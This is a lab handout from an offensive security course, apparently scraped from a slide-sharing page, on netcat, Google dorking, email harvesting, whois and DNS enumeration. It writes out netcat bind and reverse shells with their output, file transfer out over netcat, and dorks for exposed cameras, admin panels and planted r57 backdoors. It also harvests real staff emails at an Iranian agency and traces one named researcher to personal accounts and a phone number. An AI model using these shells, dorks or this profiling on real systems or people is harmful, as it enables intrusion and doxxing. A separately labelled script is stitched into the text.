Offensive Security Course Lab
Netcat and Enumeration (Google Hacking, Whois and DNS)
1. NETCAT
a) Help
root@bt:~/lab_bash-script# nc -h
[v1.10-38]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands
as `-e'; use /bin/sh to exec [dangerous!!]
-e filename
program to exec after connect [dangerous!!]
-b
allow broadcasts
-g gateway
source-routing hop point[s], up to 8
-G num
source-routing pointer: 4, 8, 12, ...
-h
this cruft
-i secs
delay interval for lines sent, ports scanned
-k
set keepalive option on socket
-l
listen mode, for inbound connects
-n
numeric-only IP addresses, no DNS
-o file
hex dump of traffic
-p port
local port number
-r
randomize local and remote ports
-q secs
quit after EOF on stdin and delay of secs
-s addr
local source address
-T tos
set Type Of Service
-t
answer TELNET negotiation
-u
UDP mode
-v
verbose [use twice to be more verbose]
-w secs
timeout for connects and final net reads
-z
zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp-data').
root@bt:~/lab_bash-script#

Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993

1
b) Banner grabbing
Checking for open ports and reading the service banners
root@bt:~/lab_bash-script# nc -nv 172.16.49.100 21
(UNKNOWN) [172.16.49.100] 21 (ftp) open
220 (vsFTPd 2.3.0)
root@bt:~/lab_bash-script# nc -nv 172.16.49.100 80
(UNKNOWN) [172.16.49.100] 80 (www) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 20 Jun 2012 22:01:42 GMT
Server: Apache/2.2.16 (Ubuntu)
Last-Modified: Wed, 20 Jun 2012 21:57:24 GMT
ETag: "c5af2-b1-4c2ee7bee7e05"
Accept-Ranges: bytes
Content-Length: 177
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

c) Simple chat
On BackTrack
nc -lvp 4444

On Windows XP-SP2
nc -nv 172.16.49.130 4444

Just type anything on either machine and it shows up on the other one.

d) Remote administration
- BIND SHELL
On the BT box on the external network
root@bt:~# nc -lvp 4444 -e /bin/bash
listening on [any] 4444 ...
On the Windows XP-SP2 machine on the internal network
C:\>nc -nv 172.16.49.130 4444
(UNKNOWN) [172.16.49.130] 4444 (?) open
ls
Desktop
lab_bash-script
rota.sh
- REVERSE SHELL – NC
On the BT box on the external network
root@bt:~# nc -lvp 4444
listening on [any] 4444 ...

On the Windows XP-SP2 machine on the internal network
C:\>nc -nv 172.16.49.130 4444 -e cmd.exe
(UNKNOWN) [172.16.49.130] 4444 (?) open

Result on BT
root@bt:~# nc -lvp 4444
listening on [any] 4444 ...
172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out
connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1214
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\>hostname
hostname
CTP028
C:\>

e) Port scan
External BT scanning the firewall (ports 21 to 30)
root@bt:~# nc -z -nvv -w 1 172.16.49.100 21-30
(UNKNOWN) [172.16.49.100] 30 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 29 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 28 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 27 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 26 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 25 (smtp) : Connection refused
(UNKNOWN) [172.16.49.100] 24 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 23 (telnet) : Connection refused
(UNKNOWN) [172.16.49.100] 22 (ssh) open
(UNKNOWN) [172.16.49.100] 21 (ftp) open

f) File transfer
On the external BT, listening to receive the file
root@bt:~# nc -lvp 4444 > output.txt
listening on [any] 4444 ...
172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out
connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1224
On Windows XP-SP2 on the internal network
C:\>nc.exe -nv 172.16.49.130 4444 < arq1.txt
(UNKNOWN) [172.16.49.130] 4444 (?) open
Result
root@bt:~# ls
Desktop lab_bash-script output.txt rota.sh
root@bt:~# more output.txt
teste de transferencia
root@bt:~#

2. Google Search
Google search operators - check the site: operator and the others

site:offensive-security.com - see how many web pages the domain has (indexed pages)

site:www.offensive-security.com filetype:pdf (PDF only)

site:aeoi.org.ir (21,800 pages)

intitle:"Remote Desktop Web Connection" inurl:tsweb

Google Hacking Database (GHDB)

site running Webmin
inurl:10000 webmin

site running a VNC server
intitle:"VNC viewer for java" --- VNC servers
http://okbk.myvnc.com:5800/

print server
intitle:"Network Print Server" filetype:shtm

SpeedStream router web interface
intitle:"SpeedStream Router Management Interface"

intitle:"Setup Home" "You will need * log in before * * change * settings" (belkin)

Security camera
inurl:"viewerframe?mode=motion"

inurl:"ViewerFrame?Mode="

inurl:"view/index.shtml"
"please visit" intitle:"i-Catcher Console" Copyright "iCode"
intitle:"everfocus edsr applet"

Videoconferencing software
intext:"Videoconference Management System" ext:htm

exposed phpMyAdmin
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"

Norton AV for gateways
inurl:"8003/Display?what="

MSN contacts
filetype:ctt "msn"

Kickstart
#kickstart filetype:cfg
#kickstart filetype:cfg site:gov.br

CAREFUL!!!!!!
Apache backdoor
intitle:r57 shell filetype:php

Site with a planted backdoor - "Antichat" in the title
intitle:"Antichat Shell" "disable functions"

3. Google Search Social
aeoi.org.ir on its own in Google - look for e-mail addresses

use theharvester.py (Python script on BT)
root@bt:~# cd /pentest/enumeration/theharvester/
root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d aeoi.org.ir -l 500 -b google
[-] Searching in Google:
Searching 0 results...
Searching 100 results...
Searching 200 results...
[+] Emails found:
-----------------
hkazemian@aeoi.org.ir
sjahmadi@aeoi.org.ir
smshirvani@aeoi.org.ir
mmostaedi@aeoi.org.ir
AA37120067@aeoi.org.ir
jrahighi@aeoi.org.ir
sabolhosseini@aeoi.org.ir
mghannadi@aeoi.org.ir
rd@aeoi.org.ir
use hkazemian@aeoi.org.ir
he is a researcher and has a Yahoo e-mail address

use hkazemian@yahoo.com

see SPAG Zeolite
company address, contact phone and another Gmail address

- look for a photo
use hosseinkazemian@gmail.com - looking for an apartment, see the phone number

4. Whois

Whois query
root@bt:~# whois checkpoint.com | more
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Server Name: CHECKPOINT.COM
IP Address: 216.200.241.66
Registrar: NETWORK SOLUTIONS, LLC.
Whois Server: whois.networksolutions.com
Referral URL: http://www.networksolutions.com/en_US/
Domain Name: CHECKPOINT.COM
Registrar: NETWORK SOLUTIONS, LLC.
Whois Server: whois.networksolutions.com
Referral URL: http://www.networksolutions.com/en_US/
Name Server: NS2.CHECKPOINT.COM
Name Server: NS6.CHECKPOINT.COM
Name Server: NS8.CHECKPOINT.COM
Name Server: NS9.CHECKPOINT.COM
Status: clientTransferProhibited
Updated Date: 30-may-2012
Creation Date: 29-mar-1994
Expiration Date: 30-mar-2018
Administrative Contact, Technical Contact:
Admin, DNS
hostmaster@CHECKPOINT.COM
Check Point Software Technologies Ltd.
3A Jabotinsky St.
Ramat-Gan, 52520
IL
+972-3-7534555 fax: +972-3-5759256
Record expires on 30-Mar-2018.
Record created on 29-Mar-1994.
Database last updated on 20-Jun-2012 22:30:44 EDT.
Domain servers in listed order:
NS2.CHECKPOINT.COM
NS6.CHECKPOINT.COM
NS8.CHECKPOINT.COM
NS9.CHECKPOINT.COM

206.184.151.195
194.29.32.199
216.228.148.29
194.29.38.64

Reverse whois query (by IP address)
root@bt:~# whois 216.200.241.66
#
# Query terms are ambiguous. The query is assumed to be:
# "n 216.200.241.66"
#
# Use "?" to get help.
#
#
# The following results may also be obtained via:
#
http://whois.arin.net/rest/nets;q=216.200.241.66?showDetails=true&showARIN=false&ext=netref2
#
CHECKPOINT SOFTWARE MFN-B655-216-200-241-64-28 (NET-216-200-241-64-1) 216.200.241.64 - 216.200.241.79
Abovenet Communications, Inc ABOVENET-5 (NET-216-200-0-0-1) 216.200.0.0 - 216.200.255.255

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html

5. DNS
Manual queries
root@bt:~# nslookup www.checkpoint.com
Server: 172.16.49.2
Address: 172.16.49.2#53
Non-authoritative answer:
Name: www.checkpoint.com
Address: 216.200.241.66
Querying the domain's mail (MX) and name (NS) servers
root@bt:~# nslookup
> set type=mx
> checkpoint.com
Server: 172.16.49.2
Address: 172.16.49.2#53
Non-authoritative answer:
checkpoint.com mail exchanger = 12 sami.checkpoint.com.
checkpoint.com mail exchanger = 15 usmail-as.zonelabs.com.
Authoritative answers can be found from:
> set type=ns
> checkpoint.com
Server: 172.16.49.2
Address: 172.16.49.2#53
Non-authoritative answer:
checkpoint.com nameserver = ns2.checkpoint.com.
checkpoint.com nameserver = ns6.checkpoint.com.
checkpoint.com nameserver = ns8.checkpoint.com.
checkpoint.com nameserver = ns9.checkpoint.com.
checkpoint.com nameserver = ns1.checkpoint.com.
Authoritative answers can be found from:
>

- DNS Information Gathering
1- forward lookup brute force - try to guess valid host names
root@bt:~/lab_DNS# host www.checkpoint.com
www.checkpoint.com has address 216.200.241.66
www.checkpoint.com has IPv6 address 2620:0:2a01:2::1a10
root@bt:~/lab_DNS# host wwwwwwww.checkpoint.com
Host wwwwwwww.checkpoint.com not found: 3(NXDOMAIN)
root@bt:~/lab_DNS#
- use script_dns1.sh on BT for the forward brute force (raw host output, no filtering)
root@bt:~/lab_DNS# more script_dns1.sh
#!/bin/bash
for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do
host $name.checkpoint.com
done
- use script_dns2.sh on BT for the forward brute force ("has address" lines only)
root@bt:~/lab_DNS# more script_dns2.sh
#!/bin/bash
for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do
host $name.checkpoint.com | grep "has address"
done
root@bt:~/lab_DNS# ./script_dns2.sh
forums.checkpoint.com has address 194.29.38.13
ftp.checkpoint.com has address 194.29.38.25
ftps.checkpoint.com has address 194.29.38.27
mailhost.checkpoint.com has address 194.29.32.199
cale.checkpoint.com has address 194.29.32.199
mx1.checkpoint.com has address 194.29.38.66
ns.checkpoint.com has address 194.29.32.199
ns1.checkpoint.com has address 208.185.174.140
ns2.checkpoint.com has address 208.185.174.141
register.checkpoint.com has address 194.29.38.35
search.us.checkpoint.com has address 209.87.209.207
smtp.checkpoint.com has address 194.29.34.68
www.checkpoint.com has address 216.200.241.66
www.checkpoint.com has address 216.200.241.66
root@bt:~/lab_DNS#

- use script_dns3.sh on BT for the forward brute force (IPs only)
root@bt:~/lab_DNS# more script_dns3.sh
#!/bin/bash
for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do
host $name.checkpoint.com | grep "has address" | cut -d" " -f4
done
root@bt:~/lab_DNS# ./script_dns3.sh
194.29.38.13
194.29.38.25
194.29.38.27
194.29.32.199
194.29.32.199
194.29.38.66
194.29.32.199
208.185.174.140
208.185.174.141
194.29.38.35
209.87.209.207
194.29.34.68
216.200.241.66
216.200.241.66
2- reverse lookup brute force
- Try reverse resolution on the address block found in the whois query
root@bt:~/lab_DNS# host 216.200.241.66
66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com.
root@bt:~/lab_DNS# for ip in $(seq 64 79); do host 216.200.241.$ip | grep "domain name pointer" ;done
64.241.200.216.in-addr.arpa domain name pointer 216.200.241.64.available.above.net.
65.241.200.216.in-addr.arpa domain name pointer lata-gw.us.checkpoint.com.
66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com.
67.241.200.216.in-addr.arpa domain name pointer garmin.us.checkpoint.com.
68.241.200.216.in-addr.arpa domain name pointer flanger.us.checkpoint.com.
69.241.200.216.in-addr.arpa domain name pointer gould.us.checkpoint.com.
70.241.200.216.in-addr.arpa domain name pointer franklin.us.checkpoint.com.
71.241.200.216.in-addr.arpa domain name pointer darwin.us.checkpoint.com.
72.241.200.216.in-addr.arpa domain name pointer artemis.us.checkpoint.com.
73.241.200.216.in-addr.arpa domain name pointer amadeus.us.checkpoint.com.
74.241.200.216.in-addr.arpa domain name pointer streamer.us.checkpoint.com.
75.241.200.216.in-addr.arpa domain name pointer lata1.us.checkpoint.com.
76.241.200.216.in-addr.arpa domain name pointer lata2.us.checkpoint.com.
77.241.200.216.in-addr.arpa domain name pointer davis1.us.checkpoint.com.
78.241.200.216.in-addr.arpa domain name pointer davis2.us.checkpoint.com.
79.241.200.216.in-addr.arpa domain name pointer 216.200.241.79.available.above.net.
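One way to post-process the forward and reverse lookups above. This is an added example, not one of the course's scripts: it takes the last field of each `host` answer instead of `cut -d" " -f4`, so a "has IPv6 address" line is not misread, rebuilds the dotted-quad from the reversed in-addr.arpa name, and de-duplicates addresses, which the output above needs since mailhost, cale and ns all resolve to 194.29.32.199. The sample lines embedded in it are constructed from the page's own output plus one IPv6 and one NXDOMAIN answer; the forward_lookup driver and the dns.txt path are the page's, but are not run here.

```shell
#!/bin/sh
# Added example (not from the course material): parse the output of the
# `host` forward and reverse lookups instead of relying on cut -d" " -f4,
# and de-duplicate the addresses that several names share.

# Constructed sample: lines copied from the page's lookups plus one IPv6 answer
# and one NXDOMAIN line so the parser's edge cases are exercised offline.
SAMPLE_FORWARD='www.checkpoint.com has address 216.200.241.66
www.checkpoint.com has IPv6 address 2620:0:2a01:2::1a10
Host wwwwwwww.checkpoint.com not found: 3(NXDOMAIN)
mailhost.checkpoint.com has address 194.29.32.199
cale.checkpoint.com has address 194.29.32.199
ns.checkpoint.com has address 194.29.32.199
www.checkpoint.com has address 216.200.241.66'

# Constructed sample of reverse lookups (two lines from the page, one NXDOMAIN).
SAMPLE_REVERSE='64.241.200.216.in-addr.arpa domain name pointer 216.200.241.64.available.above.net.
66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com.
Host 80.241.200.216.in-addr.arpa. not found: 3(NXDOMAIN)'

# Driver for a live run (needs network and the dns.txt wordlist from the page):
#   forward_lookup checkpoint.com < /pentest/enumeration/dns/dnsenum/dns.txt | parse_forward
forward_lookup() {
  while read -r name; do
    [ -n "$name" ] && host "$name.$1"
  done
}

# name<TAB>address for every A or AAAA answer; NXDOMAIN and alias lines are dropped.
# $NF (last field) is used because the IPv6 answer has one extra word.
parse_forward() {
  awk '/ has (IPv6 )?address / { print $1 "\t" $NF }'
}

# Unique IPv4 addresses, one per line: the set of hosts actually exposed.
unique_ipv4() {
  awk '/ has address / { print $NF }' | sort -u
}

# address<TAB>comma-separated names: shows which names land on the same host.
names_per_ipv4() {
  awk '/ has address / && !seen[$NF, $1]++ {
         names[$NF] = (names[$NF] == "" ? "" : names[$NF] ",") $1 }
       END { for (ip in names) print ip "\t" names[ip] }' | sort
}

# address<TAB>ptr for reverse lookups: rebuild the dotted-quad from the
# reversed in-addr.arpa octets and strip the trailing dot of the FQDN.
parse_reverse() {
  awk '/ domain name pointer / {
         split($1, o, ".")
         ptr = $NF; sub(/\.$/, "", ptr)
         print o[4] "." o[3] "." o[2] "." o[1] "\t" ptr }'
}

# Helpers that run the parsers over the constructed samples.
count_unique_ipv4()     { printf '%s\n' "$SAMPLE_FORWARD" | unique_ipv4 | wc -l | tr -d ' '; }
count_forward_answers() { printf '%s\n' "$SAMPLE_FORWARD" | parse_forward | wc -l | tr -d ' '; }
first_reverse_line()    { printf '%s\n' "$SAMPLE_REVERSE" | parse_reverse | head -n 1; }
first_shared_address()  { printf '%s\n' "$SAMPLE_FORWARD" | names_per_ipv4 | head -n 1; }

printf '%s\n' "$SAMPLE_FORWARD" | names_per_ipv4
printf '%s\n' "$SAMPLE_REVERSE" | parse_reverse
```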
3- Zone transfer
root@bt:~# host -t ns offensive-security.com
offensive-security.com name server ns4.no-ip.com.
offensive-security.com name server ns2.no-ip.com.
offensive-security.com name server ns1.no-ip.com.
offensive-security.com name server ns3.no-ip.com.
offensive-security.com name server ns5.no-ip.com.
root@bt:~# host -l offensive-security.com ns1.no-ip.com
; Transfer failed.
Using domain server:
Name: ns1.no-ip.com
Address: 204.16.255.55#53
Aliases:
Host offensive-security.com.localdomain not found: 9(NOTAUTH)
; Transfer failed.
------try all the name servers (primary and secondaries)
------do the same for aeoi.org.ir and estacio.br

Use /pentest/enumeration/dnsenum
root@bt:/pentest/enumeration/dns/dnsenum# ls
dns-big.txt dnsenum.pl dns.txt README.txt
root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl estacio.br
estacio.br                     5      IN A      200.216.152.71
Name Servers:
ns1.estacio.br                 5      IN A      200.216.152.249
ns2.estacio.br                 5      IN A      200.216.152.250
Mail (MX) Servers:
Mail.Global.FrontBridge.com    5      IN A      216.32.180.22
Mail.Global.FrontBridge.com    5      IN A      216.32.181.178
estacio.br                     1800   IN TXT
estacio.br                     1800   IN A      200.216.152.71
1989163337.estacio.br          1800   IN CNAME
mail._domainkey.estacio.br     14400  IN TXT
agenda.estacio.br              1800   IN A      200.216.152.71
agendaconselho.estacio.br      1800   IN A      200.216.152.71
aluno.estacio.br               1800   IN MX
biblioteca.estacio.br          1800   IN CNAME
bibliotecasonora.estacio.br    1800   IN A      200.216.152.90
blogdopresidente.estacio.br    1800   IN A      200.216.152.149
bquestoes.estacio.br           1800   IN A      200.216.152.63
adm.bquestoes.estacio.br       1800   IN A      200.216.152.62
provas.bquestoes.estacio.br    1800   IN A      200.216.152.63


Weitere ähnliche Inhalte

Was ist angesagt?

Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupCyber Security Alliance
 
Nmap(network mapping)
Nmap(network mapping)Nmap(network mapping)
Nmap(network mapping)SSASIT
 
Humantalk Angers 14 Mars
Humantalk Angers 14 MarsHumantalk Angers 14 Mars
Humantalk Angers 14 MarsRémi Dubois
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsBishop Fox
 
Kernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner KochKernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner KochAnne Nicolas
 
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawBeginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawRedspin, Inc.
 
The Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF PrimerThe Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF PrimerSasha Goldshtein
 
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...sonjeku1
 
Tomas Hlavacek - IP fragmentation attack on DNS
Tomas Hlavacek - IP fragmentation attack on DNSTomas Hlavacek - IP fragmentation attack on DNS
Tomas Hlavacek - IP fragmentation attack on DNSDefconRussia
 
Nmap Hacking Guide
Nmap Hacking GuideNmap Hacking Guide
Nmap Hacking GuideAryan G
 
Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Ravi Rajput
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging RubyAman Gupta
 
Linux networking commands
Linux networking commandsLinux networking commands
Linux networking commandsSayed Ahmed
 

Was ist angesagt? (19)

Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setup
 
Nmap(network mapping)
Nmap(network mapping)Nmap(network mapping)
Nmap(network mapping)
 
Humantalk Angers 14 Mars
Humantalk Angers 14 MarsHumantalk Angers 14 Mars
Humantalk Angers 14 Mars
 
Nmap tutorial
Nmap tutorialNmap tutorial
Nmap tutorial
 
Network commands
Network commandsNetwork commands
Network commands
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
 
Nmap scripting engine
Nmap scripting engineNmap scripting engine
Nmap scripting engine
 
Kernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner KochKernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
 
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawBeginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
 
The Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF PrimerThe Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF Primer
 
DMVPN
DMVPNDMVPN
DMVPN
 
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
 
Tomas Hlavacek - IP fragmentation attack on DNS
Tomas Hlavacek - IP fragmentation attack on DNSTomas Hlavacek - IP fragmentation attack on DNS
Tomas Hlavacek - IP fragmentation attack on DNS
 
Nmap Hacking Guide
Nmap Hacking GuideNmap Hacking Guide
Nmap Hacking Guide
 
Dynamic Port Scanning
Dynamic Port ScanningDynamic Port Scanning
Dynamic Port Scanning
 
20141106 asfws unicode_hacks
20141106 asfws unicode_hacks20141106 asfws unicode_hacks
20141106 asfws unicode_hacks
 
Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging Ruby
 
Linux networking commands
Linux networking commandsLinux networking commands
Linux networking commands
 

Ähnlich wie 2 netcat enum-pub

Pentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdfPentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdffaker1842002
 
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...Felipe Prado
 
Network Test Automation - Net Ops Coding 2015
Network Test Automation - Net Ops Coding 2015Network Test Automation - Net Ops Coding 2015
Network Test Automation - Net Ops Coding 2015Hiroshi Ota
 
Openstack 101
Openstack 101Openstack 101
Openstack 101POSSCON
 
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCPKonfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCPWalid Umar
 
EBU DRW 2011 - CRC-mmbTools - Software Radio Workshop
EBU DRW 2011 - CRC-mmbTools - Software Radio WorkshopEBU DRW 2011 - CRC-mmbTools - Software Radio Workshop
EBU DRW 2011 - CRC-mmbTools - Software Radio WorkshopPascal Charest
 
Linux Network commands
Linux Network commandsLinux Network commands
Linux Network commandsHanan Nmr
 
Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019Nikhil Raj
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap OWASP Delhi
 
PythonBrasil[8] - CPython for dummies
PythonBrasil[8] - CPython for dummiesPythonBrasil[8] - CPython for dummies
PythonBrasil[8] - CPython for dummiesTatiana Al-Chueyr
 
Incident response: Advanced Network Forensics
Incident response: Advanced Network ForensicsIncident response: Advanced Network Forensics
Incident response: Advanced Network ForensicsNapier University
 
Debugging Network Issues
Debugging Network IssuesDebugging Network Issues
Debugging Network IssuesApcera
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersYury Chemerkin
 
Simplest-Ownage-Human-Observed… - Routers
 Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - RoutersLogicaltrust pl
 
Rete di casa e raspberry pi - Home network and Raspberry Pi
Rete di casa e raspberry pi - Home network and Raspberry Pi Rete di casa e raspberry pi - Home network and Raspberry Pi
Rete di casa e raspberry pi - Home network and Raspberry Pi Daniele Albrizio
 
Gameboy emulator in rust and web assembly
Gameboy emulator in rust and web assemblyGameboy emulator in rust and web assembly
Gameboy emulator in rust and web assemblyYodalee
 

Ähnlich wie 2 netcat enum-pub (20)

Pentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdfPentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
 
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
 
Linux networking
Linux networkingLinux networking
Linux networking
 
Bsides final
Bsides finalBsides final
Bsides final
 
Network Test Automation - Net Ops Coding 2015
Network Test Automation - Net Ops Coding 2015Network Test Automation - Net Ops Coding 2015
Network Test Automation - Net Ops Coding 2015
 
Openstack 101
Openstack 101Openstack 101
Openstack 101
 
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCPKonfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
 
EBU DRW 2011 - CRC-mmbTools - Software Radio Workshop
EBU DRW 2011 - CRC-mmbTools - Software Radio WorkshopEBU DRW 2011 - CRC-mmbTools - Software Radio Workshop
EBU DRW 2011 - CRC-mmbTools - Software Radio Workshop
 
Linux Network commands
Linux Network commandsLinux Network commands
Linux Network commands
 
Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap
 
R-House (LSRC)
R-House (LSRC)R-House (LSRC)
R-House (LSRC)
 
PythonBrasil[8] - CPython for dummies
PythonBrasil[8] - CPython for dummiesPythonBrasil[8] - CPython for dummies
PythonBrasil[8] - CPython for dummies
 
Incident response: Advanced Network Forensics
Incident response: Advanced Network ForensicsIncident response: Advanced Network Forensics
Incident response: Advanced Network Forensics
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 
Debugging Network Issues
Debugging Network IssuesDebugging Network Issues
Debugging Network Issues
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routers
 
Simplest-Ownage-Human-Observed… - Routers
 Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers
 
Rete di casa e raspberry pi - Home network and Raspberry Pi
Rete di casa e raspberry pi - Home network and Raspberry Pi Rete di casa e raspberry pi - Home network and Raspberry Pi
Rete di casa e raspberry pi - Home network and Raspberry Pi
 
Gameboy emulator in rust and web assembly
Gameboy emulator in rust and web assemblyGameboy emulator in rust and web assembly
Gameboy emulator in rust and web assembly
 

Mehr von Cassio Ramos

Mehr von Cassio Ramos (20)

Aula Inaugural
Aula InauguralAula Inaugural
Aula Inaugural
 
Redes de Banda Larga
Redes de Banda LargaRedes de Banda Larga
Redes de Banda Larga
 
Block disp-entrada e saida
Block disp-entrada e saidaBlock disp-entrada e saida
Block disp-entrada e saida
 
Trabalho sobre truecrypt
Trabalho sobre truecryptTrabalho sobre truecrypt
Trabalho sobre truecrypt
 
Gpo
GpoGpo
Gpo
 
Tunneling
TunnelingTunneling
Tunneling
 
Truecrypt
TruecryptTruecrypt
Truecrypt
 
Endian firewall
Endian firewallEndian firewall
